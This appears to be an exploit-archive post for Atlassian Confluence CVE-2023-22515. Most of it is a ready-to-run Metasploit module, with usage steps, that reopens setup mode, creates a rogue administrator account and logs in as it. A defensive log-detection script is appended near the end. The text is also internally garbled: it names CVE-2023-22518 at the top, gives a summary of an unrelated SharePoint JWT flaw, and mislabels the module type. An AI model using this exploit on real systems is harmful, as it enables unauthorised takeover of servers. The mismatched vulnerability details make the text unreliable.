Confluence 8.x Privilege Escalation
Confluence 8.x versions have been susceptible to critical privilege escalation vulnerabilities. A notable example, CVE-2023-22518, allows an unauthenticated attacker to exploit improper authorization.

By targeting specific setup or administrative endpoints, such as `/setup/setupadministrator.action`, an attacker can bypass security checks. This enables them to create a new administrator account for the Confluence instance. Upon successful creation, the attacker gains full administrative control, escalating privileges from unauthenticated to complete system access.

This allows for data manipulation, unauthorized access to sensitive content, and further compromise. Prompt upgrading to patched versions is essential to secure instances against such threats.

=============================================================================================================================================
| # Title : Confluence 8.x Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.atlassian.com/software/confluence |
=============================================================================================================================================

POC :

1. Summary :
A critical authentication bypass vulnerability in Microsoft SharePoint known as CVE-2023-29357. (https://packetstorm.news/files/id/207960/)
The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user,
including Site Administrators, without possessing valid credentials.
The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.

===============
# Save & Usage
===============

1. Save module as:
modules/auxiliary/admin/http/confluence_cve_2023_22515.rb

2. Reload Metasploit:
msfconsole
reload_all

3. Use module:
use auxiliary/admin/http/confluence_cve_2023_22515

4. Set options:
set RHOSTS https://target.com
set TARGETURI /
set USERNAME pleasepatch
set PASSWORD Password2

5. Run:
run
-------------------------
auxiliary :
-------------------------
##
# This file is part of the Metasploit Framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Atlassian Confluence Unauthenticated Privilege Escalation (CVE-2023-22515)',
      'Description' => %q{
        This module exploits CVE-2023-22515, an authentication bypass and setup
        reopening vulnerability in Atlassian Confluence Data Center and Server.

        An attacker can force Confluence into setup mode, then create a NEW
        administrator account and authenticate with full admin privileges.

        This module replicates the exact behavior of the PoC Python script:
        1- trigger vulnerability via /server-info.action?setupComplete=false
        2- create admin user
        3- authenticate via REST API
      },
      'Author' => [
        'Chocapikk - PoC',
        'indoushka - Full Metasploit conversion'
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2023-22515'],
        ['URL', 'https://github.com/Chocapikk/CVE-2023-22515']
      ],
      'Platform' => 'linux',
      'Arch' => ARCH_ALL,
      'Targets' => [['Automatic', {}]],
      'DisclosureDate' => '2023-10-04',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path', '/']),
        OptString.new('USERNAME', [true, 'Admin username to create', 'pleasepatch']),
        OptString.new('PASSWORD', [true, 'Admin password to create', 'Password2'])
      ]
    )
  end

  #
  # Check Vuln
  # Note: the check itself sends the setup-reopening request, so it is not passive.
  #
  def check
    v = trigger_setup
    return Exploit::CheckCode::Vulnerable if v
    Exploit::CheckCode::Safe
  end

  #
  # Exploit
  #
  def exploit
    print_status("Triggering setup mode bypass on target...")
    unless trigger_setup
      fail_with(Failure::NotVulnerable, 'Could not reopen setup mode.')
    end

    print_good("Setup mode reopened successfully")

    print_status("Creating new administrator account...")
    unless create_admin
      fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
    end

    print_good("Admin account created successfully")

    print_status("Authenticating to REST API as #{datastore['USERNAME']} ...")

    if authenticate_user
      print_good("Successfully logged in as #{datastore['USERNAME']}! FULL ADMIN PWNED")
    else
      fail_with(Failure::NoAccess, 'Authentication failed after account creation')
    end
  end

  #
  # Step 1 - Trigger vulnerability
  #
  def trigger_setup
    send_req(
      "GET",
      normalize_uri(target_uri.path, "server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false")
    )&.code == 200
  end

  #
  # Step 2 - Create Admin
  #
  def create_admin
    data = {
      "username" => datastore['USERNAME'],
      "fullName" => datastore['USERNAME'],
      "email" => "#{datastore['USERNAME']}@localhost",
      "password" => datastore['PASSWORD'],
      "confirm" => datastore['PASSWORD'],
      "setup-next-button" => "Next"
    }

    res = send_req("POST", normalize_uri(target_uri.path, "setup", "setupadministrator.action"), data)

    return false unless res

    # Either a fresh creation or a pre-existing account of that name counts as success
    if res.body.include?("Setup Successful") ||
       res.body.include?("A user with this username already exists")
      return true
    end

    false
  end

  #
  # Step 3 - Validate Login
  #
  def authenticate_user
    auth = Rex::Proto::Http::Client::BasicAuthHeader.new(
      datastore['USERNAME'],
      datastore['PASSWORD']
    )

    res = send_req(
      "GET",
      normalize_uri(target_uri.path, "rest/api/user?username=#{datastore['USERNAME']}"),
      nil,
      auth
    )

    return false unless res && res.code == 200
    true
  end

  #
  # Unified request (5 second timeout; nil on timeout)
  #
  def send_req(method, uri, data = nil, auth = nil)
    begin
      send_request_cgi({
        'method' => method,
        'uri' => uri,
        'ctype' => 'application/x-www-form-urlencoded',
        'data' => data,
        'authorization' => auth ? auth.to_s : nil,
        'headers' => {
          "X-Atlassian-Token" => "no-check",
          "User-Agent" => "Metasploit - CVE-2023-22515"
        }
      }, 5)
    rescue ::Rex::Error::RequestTimeout
      return nil
    end
  end
end
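As a defender-side example added here (not part of the advisory or the module above), the following Ruby routine scans web-server access-log lines for the two requests the module chains: a GET to server-info.action carrying setupComplete=false, followed by a POST to /setup/setupadministrator.action from the same source. The log lines are constructed samples, and the parser assumes a combined-log-style format.

```ruby
# Added example: flag the CVE-2023-22515 request chain in Confluence access logs.
# The sample lines below are constructed; LOG_RE assumes a combined-log-style
# layout (client ip, timestamp in brackets, quoted request line, status code).
SETUP_REOPEN = /server-info\.action\?[^ ]*setupComplete=false/i
ADMIN_CREATE = %r{/setup/setupadministrator\.action}i

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Returns { source_ip => [finding, ...] }; only sources with findings appear.
def detect_setup_abuse(lines)
  seen_reopen = {}                              # ip => timestamp of setup-reopen GET
  findings = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    req = parse_line(line)
    next unless req
    if req[:method] == 'GET' && SETUP_REOPEN.match?(req[:path])
      seen_reopen[req[:ip]] = req[:ts]
      findings[req[:ip]] << "setup-reopen attempt (status #{req[:status]})"
    elsif req[:method] == 'POST' && ADMIN_CREATE.match?(req[:path])
      # A setup POST after a reopen GET from the same source is the full chain;
      # a lone setup POST on a configured instance is still worth a look.
      severity = seen_reopen.key?(req[:ip]) ? 'CRITICAL: admin creation after setup reopen' : 'WARNING: admin creation POST'
      findings[req[:ip]] << "#{severity} (status #{req[:status]})"
    end
  end
  findings
end

# Constructed sample log: one source runs the chain, another browses normally.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Oct/2023:10:00:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 200 512
  203.0.113.7 - - [04/Oct/2023:10:00:02 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0
  198.51.100.9 - - [04/Oct/2023:10:05:00 +0000] "GET /wiki/spaces/ENG/pages/1 HTTP/1.1" 200 8820
LOG

if __FILE__ == $PROGRAM_NAME
  detect_setup_abuse(SAMPLE_LOG.lines).each do |ip, events|
    puts "#{ip}:"
    events.each { |e| puts "  #{e}" }
  end
end
```

Blocking the /setup/* paths at the reverse proxy was Atlassian's interim mitigation for this issue until the instance is upgraded, and it also turns any further attempt into a clean 403 in the same logs.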

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================